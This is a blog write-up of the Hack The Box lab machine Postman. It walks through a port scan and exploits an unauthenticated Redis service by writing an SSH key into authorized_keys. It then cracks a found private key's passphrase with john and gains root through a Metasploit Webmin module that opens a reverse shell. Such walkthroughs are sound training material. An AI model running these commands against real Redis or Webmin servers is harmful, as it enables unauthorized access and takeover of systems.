23rd November 2020
Hack The Box Write-Up Postman by T13nn3s

Hack The Box Write-Up Postman – 10.10.10.160

A hacker does for love what others would not do for money.

Laura Creighton

About Postman

In this post, I’m writing a write-up for the machine Postman from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills.

Postman is an ‘easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10 and submitting the root flag you points will be raised by 20.

Machine Info

Machine Info
Machine IP and creator

Enumeration

Portscan (Nmap)

First, I start with a portscan with Nmap. My initial Nmap scan missed the 6379 port. So, I scanned the target again with the port range 1-10000.

~$ nmap -p 1-10000 -sC -sV -oA ./nmap/postman.txt 10.10.10.160

The results:

Nmap scan report for 10.10.10.160                                                                                                                                                                        
Host is up (0.033s latency).                                                                                                                                                                             
Scanned at 2020-02-07 20:51:34 CET for 2957s                                                                                                                                                             
Not shown: 9965 closed ports                                                                                                                                                                             
PORT      STATE    SERVICE        VERSION                                                                                                                                                                
22/tcp    open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)                                                                                                           
| ssh-hostkey:                                                                                                                                                                                           
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)                                                                                                                                           
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open     http           Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open     redis          Redis key-value store 4.0.9
10000/tcp open     http           MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
| ndmp-version: 
|_  ERROR: Failed to get host information from server
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read from /usr/bin/../share/nmap: nmap-payloads nmap-service-probes nmap-services.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb  7 21:40:51 2020 -- 1 IP address (1 host up) scanned in 2958.40 seconds

There are three open ports:

  • 22/tcp (SSH)
  • 80/tcp (HTTP Apache Web Server)
  • 6379/tcp (Redis 4.0.9)
  • 10000/tcp (HTTP MiniServ 1.910)

Enumeration Web Server

I start enumerating the webserver and visited the website on http://10.10.10.160. I landed on a good looking web page from Cyber Geek. And it seems that I’m welcome.

The webpage on http://10.10.10.160

Looked through the website, but there are no usable pages. There is a username listed on the information bar at the bottom [email protected]. With wfuzz I have tried some wordlists, got some default folders, but nothing juicy. There is also a higher port open, let’s check the higher port.

Enumeration Webmin

I visited the following webpage: http://10.10.10.160:10000 and the is a message visible that we have to visit this website on HTTPS, so I changed the protocol and visited this page: https://10.10.10.160:10000/. And I have a login page.

Webmin on https://10.10.10.160:10000

There is also nothing here on this webpage. I need to have valid credentials to log in, but I still don’t have any credentials yet. Go to the next port 6397.

Enumerate Redis

As Redis 4.0.9 is installed on this box, it is vulnerable for Unauthenticated Code Execution. I searched on the internet for an exploit and comes up with this page: https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html. I invoked this command below:

~$ telnet 10.10.10.160 6379
Trying 10.10.10.160...
Connected to 10.10.10.160.
Escape character is '^]'.
echo "Hey no AUTH required!"
$21
Hey no AUTH required!
quit
+OK
Connection closed by foreign host.

This works, there is no authentication needed. Redis is unprotected installed without any password. Let’s exploit this vulnerability!

Exploit

Unauthenticated code execution

I can write files to this box without any authentication. Let’s try to create a new SSH Key. I invoked this command below:

~$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /home/htb/boxes/machines/postman/id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/htb/boxes/machines/postman/id_rsa.
Your public key has been saved in /home/htb/boxes/machines/postman/id_rsa.pub.
The key fingerprint is:
SHA256:ZGnXXxEXku0kHb5YIhcPsW4xC3W+WuVNrYY5w28dVh0 [email protected]
The key's randomart image is:
+---[RSA 3072]----+
|             *=E=|
|         . ..oX+*|
|        = .o.*+=B|
|       + . .=+B**|
|        S   *=+*o|
|            .=+..|
|             .o .|
|             .   |
|                 |
+----[SHA256]-----+

I created this RSA key pair with no password. Now I’ve got the key. This key needs to put into the memory of this box. I need to convert this key to the RDB format. I copied the id_rsa.pub to a text file. I added "\n\n on the front line and \n\n" on the last line, the contents of this file are shown below:

"\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcDCqfaDbp4EzyGlF3ekfopSKbq1aFbymf5H3cr6S442cvHpJ1LgSVAUUmFJXC6K6AjtQUgNm8PTljLEUp2vcTquNJo61eN3EpWJjj0SJujVohf
e/NCMosZ9t/ClKT+PN0rcRUMk6SyUAAP/ODHBbfIJxB2UPbNANDZSZzOYZ+5p4Uhyoti0qPdD8p7mQdfriCI4HqVBEgOYCoVTLYZcvTEVMV01abTc92opLsocAiwX/0OTpfyQRwhUO3kKEPEPzT3AcijW/0wcjrdtHMd4YylFmLanQTaVB1xdMKXoLczu3KqdJYr0Q4sI
6R81SvUcN718tkOeLfi+2e3tEa3XfmZxk7oGzj0s4KOYaKZ2DFhm0y8p85x0uAb9MKh3B8FeCpvwaAUzpSMGPCveqzhrM2b/XYba545ZycNfjGlkxW40QQHpT1no9Oqp7KqjvHK/3XYuiNzaZl1nsa+VSaSBk139pq+kfCf2kOjWMiMV/oW0fHjdE6ty9pA3y7t66JVBE
= [email protected]\n\n"

Now the id_rsa.txt is just our public key but with newlines. I copied the content of this file to my clipboard and created a telnet session and invoked the commands below to load this key in the memory.

~$ telnet 10.10.10.160 6379                             
Trying 10.10.10.160...
Connected to 10.10.10.160.
Escape character is '^]'.
set s-key "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcDCqfaDbp4EzyGlF3ekfopSKbq1aFbymf5H3cr6S442cvHpJ1LgSVAUUmFJXC6K6AjtQUgNm8PTljLEUp2vcTquNJo61eN3EpWJjj0SJujVohfe/NCMosZ9t/ClKT+PN0rcRUMk6SyUAAP/ODHBbfIJxB2UPbNANDZSZzOYZ+5p4Uhyoti0qPdD8p7mQdfriCI4HqVBEgOYCoVTLYZcvTEVMV01abTc92opLsocAiwX/0OTpfyQRwhUO3kKEPEPzT3AcijW/0wcjrdtHMd4YylFmLanQTaVB1xdMKXoLczu3KqdJYr0Q4sI6R81SvUcN718tkOeLfi+2e3tEa3XfmZxk7oGzj0s4KOYaKZ2DFhm0y8p85x0uAb9MKh3B8FeCpvwaAUzpSMGPCveqzhrM2b/XYba545ZycNfjGlkxW40QQHpT1no9Oqp7KqjvHK/3XYuiNzaZl1nsa+VSaSBk139pq+kfCf2kOjWMiMV/oW0fHjdE6ty9pA3y7t66JVBE= [email protected]\n\n"
+OK
config set dir /var/lib/redis/.ssh                
+OK                                               
config set dbfilename authorized_keys             
+OK                                               
save                                              
+OK                                               
quit                                              
+OK                                               
Connection closed by foreign host.

Everything looks good. Now I try to create an SSH session to this box. If everything was configured properly, I get a session without filling in any credentials.

~$ ssh -i ./id_rsa  [email protected]
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Feb  7 22:04:13 2020 from 10.10.14.183
[email protected]:~$

I’m having now an SSH session as the user redis to this box!

[email protected]:~$ whoami
redis
[email protected]:~$ pwd
/var/lib/redis
[email protected]:~$

Enumeration on user

I have an active session with this box. Let’s poke some around and let’s check if I can find the user.txt. There is a home folder for the user Matt. It seems that the user redis does not have access to open the user.txt file.

[email protected]:~$ cd /home/
[email protected]:/home$ ls
Matt
[email protected]:/home$ cd Matt/
[email protected]:/home/Matt$ ls
user.txt
[email protected]:/home/Matt$ cat user.txt 
cat: user.txt: Permission denied
[email protected]:/home/Matt$

It takes me some hours searching and poking around. It’s was driving me insane when it turned out I couldn’t find anything useful. After a little walk outside, I decided to put my previous boxes knowledge to the test and tried to use the grep command for searching for useful files. As grep is not working on this machine, I tried the ‘find’ command. After some searching, I couldn’t believe my eyes! I just found a backup of a private key!

[email protected]:/$ find . -name "id_rsa*" -print -quit
./opt/id_rsa.bak

This has to be the private key of the user Matt!

[email protected]:/opt$ cat id_rsa.bak 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----

I copied the content to the file ‘id_rsa.bak’ on my Kali machine and gave it to ssh2john:

~# python ssh2john.py id_rsa.bak 
id_rsa.bak:$sshng$0$8$73E9CEFBCCF5287C$1192$25e840e75235eebb0238e56ac96c7e0bcdfadc8381617435d43770fe9af72f6036343b41eedbec5cdcaa2838217d09d77301892540fd90a267889909cebbc5d567a9bcc3648fd648b5743360df306e396b92ed5b26ae719c95fd1146f923b936ec6b13c2c32f2b35e491f11941a5cafd3e74b3723809d71f6ebd5d5c8c9a6d72cba593a26442afaf8f8ac928e9e28bba71d9c25a1ce403f4f02695c6d5678e98cbed0995b51c206eb58b0d3fa0437fbf1b4069a6962aea4665df2c1f762614fdd6ef09cc7089d7364c1b9bda52dbe89f4aa03f1ef178850ee8b0054e8ceb37d306584a81109e73315aebb774c656472f132be55b092ced1fe08f11f25304fe6b92c21864a3543f392f162eb605b139429bb561816d4f328bb62c5e5282c301cf507ece7d0cf4dd55b2f8ad1a6bc42cf84cb0e97df06d69ee7b4de783fb0b26727bdbdcdbde4bb29bcafe854fbdbfa5584a3f909e35536230df9d3db68c90541d3576cab29e033e825dd153fb1221c44022bf49b56649324245a95220b3cae60ab7e312b705ad4add1527853535ad86df118f8e6ae49a3c17bee74a0b460dfce0683cf393681543f62e9fb2867aa709d2e4c8bc073ac185d3b4c0768371360f737074d02c2a015e4c5e6900936cca2f45b6b5d55892c2b0c4a0b01a65a5a5d91e3f6246969f4b5847ab31fa256e34d2394e660de3df310ddfc023ba30f062ab3aeb15c3cd26beff31c40409be6c7fe3ba8ca13725f9f45151364157552b7a042fa0f26817ff5b677fdd3eead7451decafb829ddfa8313017f7dc46bafaac7719e49b248864b30e532a1779d39022507d939fcf6a34679c54911b8ca789fef1590b9608b10fbdb25f3d4e62472fbe18de29776170c4b108e1647c57e57fd1534d83f80174ee9dc14918e10f7d1c8e3d2eb9690aa30a68a3463479b96099dee8d97d15216aec90f2b823b207e606e4af15466fff60fd6dae6b50b736772fdcc35c7f49e5235d7b052fd0c0db6e4e8cc6f294bd937962fab62be9fde66bf50bb149ca89996cf12a54f91b1aa2c2c6299ea9da821ef284529a5382b18d080aaede451864bb352e1fdcff981a36b505a1f2abd3a024848e0f3234ef73f3e2dda0dd7041630f695c11063232c423c7153277bbe671cb4b483f08c266fc547d89ff2b81551dabef03e6fd968a67502100111a7022ff3eb58a1fc065692d50b40eb379f155d37c1d97f6c2f5a01de13b8989174677c89d8a644758c071aea8d4c56a0374801732348db0b3164dcc82b6eaf3eb3836fa05cf5476258266a30a531e1a3132e11b944e8e0406cad59ffeaecc1ab3b7705db99353c458dc9932a638598b195e25a14051e414e20dc1510eb476a467f4e861a51036d453ea96721e0be34f4993a34b778d4111b29a63d69c1b8200869a129392684af8c4daa32f3d0a0d17c36275f039b4a3bf29e9436b912b9ed42b168c47c4205dcd00c114da8f8d82af761e69e900545eb6fc10ef1ba4934adb6fa9af17c812a8b420ed6a5b645cad812d394e93d93ccd21f2d444f1845d261796ad055c372647f0e1d8a844b8836505eb62a9b6da92c0b8a2178bad1eafbf879090c2c17e25183cf1b9f1876cf6043ea2e565fe84ae473e9a7a4278d9f00e4446e50419a641114bc626d3c61e36722e9932b4c8538da3ab44d63

Placed this hash into ‘ssh_password.txt’ and let john crack the passphrase:

~# john ssh_pssword.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (id_rsa.bak)

That’s an easy password. Let’s try to create a connection with ssh. It turns out that Matt doesn’t have permission to access through SSH. After all those hours of work, this was just a disappointment for me and came hard. I had to get myself back under control, with a cup of coffee, before I could go on.

Get user.txt

I logged back in as regis. Maybe I can switch to Matt with the su Matth command. And it is possible to switch accounts and getting the user flag!

sudo: unable to initialize policy plugin
[email protected]:~$ su Matt
Password: 
[email protected]:/var/lib/redis$ cat /home/Matt/user.txt 
517ad0ec2458ca97af8d93aac08a2f3c
[email protected]:/var/lib/redis$

It’s still very exciting to grab the user flag.

Exploit

Exploit Webdmin (Metasploit)

Now go on root! I feel like there’s been a horse in the living room for hours, and we haven’t done anything about it…. The name of the horse: Webadmin. I go back to the Webmin portal on https://10.10.10.160:10000 and logged in as Matt.

Matt has access to the Software Package Updates

Matt has access to the Software Package Updates and I found on the internet an article (https://www.exploit-db.com/exploits/46984). There is a module in Metasploit available to exploit this vulnerability. I invoked this command: msfconsole and exploited Webmin and grabbed the root.txt flag.

msf5 > use exploit/linux/http/web                                                                                                                                                                        
use exploit/linux/http/webcalendar_settings_exec  use exploit/linux/http/webid_converter            use exploit/linux/http/webmin_backdoor            use exploit/linux/http/webmin_packageup_rce        
msf5 > use exploit/linux/http/webmin_packageup_rce                                                                                                                                                       
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts 10.10.10.160                                                                                                                                  
rhosts => 10.10.10.160                                                                                                                                                                                   
msf5 exploit(linux/http/webmin_packageup_rce) > set username Matt                                                                                                                                        
username => Matt                                                                                                                                                                                         
msf5 exploit(linux/http/webmin_packageup_rce) > set password computer2008                                                                                                                                
password => computer2008                                                                                                                                                                                 
msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true                                                                                                                                             
ssl => true                                                                                                                                                                                              
msf5 exploit(linux/http/webmin_packageup_rce) > set lhost 10.10.15.62                                                                                                                                    
lhost => 10.10.15.62                                                                                                                                                                                     
msf5 exploit(linux/http/webmin_packageup_rce) > exploit                                                                                                                                                  
                                                                                                                                                                                                         
[*] Started reverse TCP handler on 10.10.15.62:4444                                                                                                                                                      
[+] Session cookie: af1882183da1a304a49faf5183463233                                                                                                                                                     
[*] Attempting to execute the payload...                                                                                                                                                                 
[*] Command shell session 1 opened (10.10.15.62:4444 -> 10.10.10.160:41504) at 2020-02-08 00:23:06 +0100                                                                                                                                                                                                                                                                shell                                                                                                                                                                                                                                                                                                                                                                                                           
[*] Trying to find binary(python) on target machine                                                                                                                                                      
[*] Found python at                                                                                                                                                                                      
[*] Using `python` to pop up an interactive shel
cat /root/root.txt
a257741c5bed8be7778c6ed95686ddce

Rooted this box. I have to say that this is the easiest privilege escalation I have ever done on Hack The Box. Do you have liked this Write-Up? Please consider spending some respect points. My profile: https://www.hackthebox.eu/profile/224856. Many thanks in Advance!!

Als always: Happy Hacking!

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published. Required fields are marked *